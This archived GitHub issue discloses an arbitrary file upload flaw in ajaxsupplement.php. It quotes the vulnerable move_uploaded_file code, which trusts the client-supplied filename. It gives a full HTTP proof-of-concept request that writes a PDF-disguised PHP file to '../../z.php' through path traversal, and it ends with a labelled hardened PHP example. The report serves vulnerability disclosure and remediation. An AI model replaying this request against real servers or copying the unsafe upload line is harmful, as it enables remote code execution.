This repository has been archived by the owner on Jan 27, 2023. It is now read-only.

Arbitrary file upload in ajaxsupplement.php #155

wednesdaygogo opened this issue Dec 18, 2022 · 0 comments

Summary

The $_POST['filename'] value is not filtered, so a file with a php suffix can be uploaded across directories.

Detail

Using the replace PDF function, an attacker can upload a file with php as the suffix and %PDF at the beginning of the file content to any directory by controlling the filename parameter.

if (in_array($file_extension, array('doc', 'docx', 'vsd', 'xls', 'xlsx', 'ppt', 'pptx', 'odt', 'ods', 'odp')))
    ...
    ...
else
    // $_POST['filename'] is concatenated straight into the destination path: no basename(), no extension check
    move_uploaded_file($_FILES['form_new_file']['tmp_name'], IL_TEMP_PATH . DIRECTORY_SEPARATOR . 'lib_' . session_id() . DIRECTORY_SEPARATOR . $_POST['filename']);

POC

Like this:

POST /ajaxsupplement.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------36332819052109193833351732483
Content-Length: 981
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer: http://127.0.0.1/index2.php
Cookie: PHPSESSID=i7l1jt5cp8bbgt41p888aii2r7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="file"

1
-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="filename"

../../z.php
-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="form_new_file"; filename="1.php"
Content-Type: application/pdf

%PDF
<?php phpinfo();?>
-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="form_new_file_link"


-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="form_graphical_abstract"


-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="form_supplementary_file[]"


-----------------------------36332819052109193833351732483
Content-Disposition: form-data; name="proxystr"


-----------------------------36332819052109193833351732483--
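A hardened form of the upload handling described in this report, added here as an example (it is not the project's code and not part of the issue). The constant IL_TEMP_PATH and the field names form_new_file and filename are taken from the report; the function name safeUploadDestination, the extension list and the content check are assumptions for illustration.

```php
<?php
// Added example, not the project's code: reject path traversal and executable
// extensions before calling move_uploaded_file().
declare(strict_types=1);

// Extensions the handler is willing to store. Server-executable extensions
// (php, phtml, ...) are deliberately absent. (Assumed list.)
const ALLOWED_EXTENSIONS = ['pdf', 'doc', 'docx', 'vsd', 'xls', 'xlsx', 'ppt', 'pptx', 'odt', 'ods', 'odp'];

/**
 * Return a safe destination path inside $baseDir, or null to reject the upload.
 *
 * @param string $baseDir       per-session upload directory (IL_TEMP_PATH/lib_<sid>)
 * @param string $requestedName the client-supplied 'filename' field
 * @param string $tmpName       $_FILES['form_new_file']['tmp_name']
 */
function safeUploadDestination(string $baseDir, string $requestedName, string $tmpName): ?string
{
    // 1. Drop every directory component: '../../z.php' becomes 'z.php'.
    //    Backslashes are normalised first so Windows-style traversal is caught too.
    $name = basename(str_replace('\\', '/', $requestedName));
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }

    // 2. Reject control characters and null bytes, which can truncate paths.
    if (preg_match('/[\x00-\x1f\x7f]/', $name) === 1) {
        return null;
    }

    // 3. Allow-list the extension; do not trust whatever the client sends.
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return null;
    }

    // 4. Check content as well as name. A leading '%PDF' is easy to fake (the
    //    report's request does exactly that), so this is a secondary check only;
    //    the extension allow-list in step 3 is what blocks executable files.
    if ($ext === 'pdf') {
        if (!is_file($tmpName)) {
            return null;
        }
        $head = file_get_contents($tmpName, false, null, 0, 5);
        if ($head === false || strncmp($head, '%PDF-', 5) !== 0) {
            return null;
        }
    }

    // 5. Resolve the base directory; the sanitised name has no separators,
    //    so the result cannot leave it.
    $realBase = realpath($baseDir);
    if ($realBase === false || !is_dir($realBase)) {
        return null;
    }
    return $realBase . DIRECTORY_SEPARATOR . $name;
}

// Usage mirroring the handler quoted in the report. IL_TEMP_PATH is assumed
// to be defined by the application (as in the original snippet).
if (defined('IL_TEMP_PATH') && isset($_FILES['form_new_file']['tmp_name'])) {
    $sessionDir = IL_TEMP_PATH . DIRECTORY_SEPARATOR . 'lib_' . session_id();
    $tmp = $_FILES['form_new_file']['tmp_name'];
    $dest = safeUploadDestination($sessionDir, (string) ($_POST['filename'] ?? ''), $tmp);

    if ($dest === null || !is_uploaded_file($tmp)) {
        http_response_code(400);
        exit('Upload rejected');
    }
    move_uploaded_file($tmp, $dest);
}
```

With this in place the request shown in the POC is rejected twice over: basename() strips the ../../ prefix, and the php extension is not in the allow-list. Serving the per-session directory with PHP execution disabled (for example, no handler for .php under IL_TEMP_PATH) is a worthwhile second layer, since an allow-list only helps for the code paths that actually use it.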

